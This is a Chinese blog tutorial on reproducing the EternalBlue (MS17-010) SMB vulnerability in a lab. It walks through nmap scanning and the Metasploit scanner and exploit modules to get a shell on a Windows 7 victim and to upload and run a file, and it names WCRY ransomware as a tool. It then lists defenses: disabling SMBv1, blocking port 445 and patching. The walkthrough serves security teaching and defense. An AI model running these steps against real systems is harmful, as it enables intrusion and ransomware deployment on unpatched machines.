永恒之蓝漏洞复现及防御

已于 2023-08-29 09:41:52 修改
阅读量650 收藏 7
点赞数 2
分类专栏: Linux操作系统 文章标签: linux 网络安全 威胁分析 安全性测试 测试工具 安全 计算机网络
于 2023-08-29 08:37:10 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wangmenghang/article/details/132532445
版权

永恒之蓝漏洞复现及防御

本教程是用于防御学习,请勿用于其他用处,否则后果自负,请遵守中华人民共和国网络安全法,作一名尊法守纪的好公民!

目录

一、永恒之蓝简介

永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经济人)公布一大批网络攻击工具、期中包含永恒之蓝工具,“永恒之蓝”利用windows系统的链接: SMB漏洞可以获取漏洞最高权限。5月12日,不法份子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高兴内网、大型企业内网和政府机关中招,被勒索支付高额赎金才能恢复文件。

二、漏洞原理

永恒之蓝是在window的SMB服务处理SMB v1请求时发生的漏洞,这个漏洞导致攻击者在目标系统上可以执行任意代码,通过永恒之蓝漏洞会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。

三、SMB协议

SMB(全称是Server Message Block)是一个协议服务器信息块,它是一种客户机/服务器、请求/响应协议,通过 SMB协议可以在计算机间共享文件、打印机、命名管道等资源,电脑上的网上邻居就是靠SMB实现的;SMB协议工作在应用层和会话层,可以用在TCP/IP协议之上,SMB使用TCP139端口和TCP445端口。

四、实验环境

1.系统:攻击机(kali linux) win7(受害机)

2.工具:NMAP Metasploit WCRY(勒索病毒)

3.网络设置,确保攻击机能与受害机进行通信

五、漏洞复现

1.检测受害机和端口,使用nmap工具进行扫描,检测目标主机是否存活,以及445端口开放情况.

ALT

nmap xxx.xxx.xxx.xxx

2.打开kali自带的Metasploit渗透工具

Alt

msfconsole

3.输入永恒之蓝漏洞编号

Alt

search ms17-010

注意:以上图可以看到,多条可利用的模块信息,永恒之蓝用到第3个模块和第0个模块,第三个模块是扫描这个网段里面哪一个主机是由这个漏洞的(scanner扫描器),第0个模块是永恒之蓝的攻击模块.

4.使用第三个扫描器进行辅助扫描测试

Alt

use 3

5.查看该漏洞模块所需要的参数情况

Alt

show options

6.设置目标机器地址

Alt

set rhosts xxx.xxx.xxx.xxx

7.检测目标主机

Alt

Run

8.进入系统攻击模块

Alt

Use exploit/windows/smb/ms17_010_etrnalblue

9.查看参数配置情况

Alt

Show options

10.设置RHosts

Alt

set rhosts xxx.xxx.xxx.xxx

11.发起攻击

Alt

run

12.进入目标机器的shell

Alt

shell

注意:如出现乱码
Alt

chcp 65001

13.上传软件到目标机器

Alt

upload /xxx/xxxx C://

14.运行软件

Alt

excute -f C:// xxx

六、漏洞防御

1、禁用SMB1协议

2、使用防火墙阻止445端口的连接

3、使用进站/出站规则阻止445端口

4、不要随意打开陌生的文件,链接

七、应急响应方案

1、断网

2、禁用SMB服务

1.打开管理员权限运行命令窗口
Alt

net stop LanmanServer和sc config LanmanServer start= disabled

2.关闭139及445端口
打开运行窗口,输入gpedit.msc-ip安全策略,在本地计算机-按照向导完成操作,可参考以下链接操作

https://jingyan.baidu.com/article/d621e8da0abd192865913f1f.html

3.永久解决
打补丁,下载微软补丁,根据自己系统的版本下载响应补丁,补丁以下链接

https://technet.microsoft.com/zh-cn/library/security/MS17-010

本教程到此结束!谢谢!如有疑问请关注私信!

Mr.LGH
关注
  • 2
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 3
    评论
专栏目录
永恒之蓝(MS17-010)的复现
Leslieyzz的博客
01-15 613
永恒之蓝(MS17-010)的复现
Kali--MSF-永恒之蓝详解(复现、演示、远程、后门、加壳、修复)
最新发布
dzqxwzoe的博客
05-31 996
永恒之蓝(EternalBlue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日,不法分子通过改造“永恒之蓝”制作了wannacry程序,使全世界大范围内遭受了该程序,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。但不过在该程序出来不久就被微软通过打补丁修复了。为了维持操作系统的安全,我们能做到的是及时更新,安装补丁,关闭不必要的服务和端口。
永恒之蓝复现
weixin_43781139的博客
11-28 1452
re狗偶尔玩一玩渗透还是比较有意思的,今天来复现一下ms17_010 靶机:win7 攻击机:kali 首先查看一下两台机器的IP win7: kali: 同时在win7下cmd执行gpedit.msc,然后对应下列路径改为已禁用,注意要重启! 来到kali打开msf 寻找17010相关模块 用use auxiliary/scanner/smb/smb_ms17_010检测一下漏洞 设置一下目标ip,run就行了 这样显示就是可以了。 我们常用的是 au
永恒之蓝复现(个人申明,此为个人学习的笔记,可能摘录自他人的文章,而非原创)
2301_76881678的博客
03-21 1710
永恒之蓝漏洞复现(单人版)
永恒之蓝复现与利用
m0_66890717的博客
04-14 1472
永恒之蓝漏洞(MS17-010),它的爆发源于 WannaCry 勒索病毒的诞生,该病毒是不法分子利用NSA(National Security Agency,美国国家安全局)泄露的漏洞 “EternalBlue”(永恒之蓝)进行改造而成。2、漏洞原理:永恒之蓝漏洞通过 TCP 的445和139端口,来利用 SMBv1 和 NBT 中的远程代码执行漏洞,通过恶意代码扫描并攻击开放445文件共享端口的 Windows 主机。一般配合使用,前者先扫描,若显示有漏洞,再进行攻击。
永恒之蓝漏洞扫描工具官方版
08-06
"永恒之蓝漏洞",全称为MS17-010漏洞,是Windows操作系统中一个极为严重的安全漏洞,由黑客组织Shadow Brokers泄露的NSA(美国国家安全局)网络武器库中的攻击工具所利用。该漏洞主要针对的是未打补丁的Windows系统...
永恒之蓝漏洞检测工具
10-10
永恒之蓝漏洞检测工具,用于扫描网络环境是否存在MS17-010漏洞。打开工具后输入ip或者ip网段(如:要检测172.16.21.1-172.16.21.254网段的设备就在里面输入:172.16.21.1/24)就可以检测设备是否有MS17-010漏洞,...
永恒之蓝漏洞演示
12-22
利用kali linux在windows7上演示永恒之蓝漏洞,有kali实战经验的可以看懂
永恒之蓝(ms17010)漏洞检测工具
04-19
在司徒西大神易语言ms17010漏洞检测源码上稍做修改,并做成了批处理,可以单机也可以网段批量检测永恒之蓝漏洞。优点是体积小,扫描准确。缺点是扫描速度较慢。 使用方法: 此程序为易语言开发,如被误报病毒,可以...
渗透基础笔记+作业(永恒之蓝复现
09-08
渗透测试是一种重要的网络安全评估方法...对于特定的漏洞如“永恒之蓝”,了解其工作原理和复现过程,对于提高网络安全防护至关重要。同时,测试报告的编写也是整个过程的成果展示,为防御者提供了改进安全策略的依据。
win2012R2永恒之蓝安全补丁.zip
05-12
网络安全领域,永恒之蓝(EternalBlue)是一个具有里程碑意义的漏洞,它曾被广泛利用于 WannaCry 勒索软件攻击中,对全球范围内的Windows系统造成了严重威胁。Windows Server 2012 R2作为微软的一款企业级服务器...
永恒之蓝检测.zip
10-20
"永恒之蓝"是2017年全球范围内爆发的一种著名勒索软件——WannaCry(想哭)的一部分,其主要利用了微软Windows系统中的SMB(Server Message Block)服务漏洞进行传播。该漏洞编号为MS17-010,影响了未打补丁的...
永恒之蓝全过程复现
Zhaokangkang123的博客
02-09 6447
超详细永恒之蓝复现教程
永恒之蓝从渗透的复现
xsguangyilong的博客
06-28 642
渗透的整理(适合小白看)
复现永恒之蓝漏洞(ms17-010)(一)复现
wty923的博客
01-12 282
永恒之蓝漏洞复现
永恒之蓝漏洞复现流程
09-01
永恒之蓝漏洞复现流程大致如下: 1. 首先,你需要准备两台机器,一台是攻击机(Linux kali),另一台是靶机(Windows 2008R2)。 2. 打开Metasploit框架,可以使用命令`msfconsole`。 3. 在Metasploit框架中,使用`search ms17_010`命令搜索永恒之蓝漏洞的相关代码。你会找到两个工具,其中`auxiliary/scanner/smb/smb_ms17_010`是用于扫描漏洞的模块,`exploit/windows/smb/ms17_010_eternalblue`是用于攻击的代码。一般情况下,你需要先使用扫描模块,如果显示存在漏洞,再使用攻击代码进行攻击。 4. 配置攻击目标IP,使用命令`use exploit/windows/smb/ms17_010_eternalblue`选择攻击模块。 5. 接下来,你需要使用该模块对靶机服务器进行攻击。使用命令`set RHOSTS <靶机IP>`来配置目标IP。 6. 最后,执行攻击命令,例如使用`exploit`命令开始攻击。 需要注意的是,复现永恒之蓝漏洞属于安全研究领域,只应在合法的环境下进行,并遵守相关法律法规。在实际环境中,应该始终保持系统和软件的更新,以免存在已知漏洞。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [永恒之蓝漏洞复现](https://blog.csdn.net/weixin_39096432/article/details/115422428)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Mr.LGH

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值